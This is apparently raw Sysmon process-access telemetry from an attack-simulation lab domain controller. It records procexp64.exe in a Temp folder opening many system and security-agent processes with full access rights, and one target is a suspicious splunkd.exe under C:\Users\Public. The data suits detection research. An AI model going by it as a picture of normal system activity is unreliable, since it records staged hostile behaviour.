15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 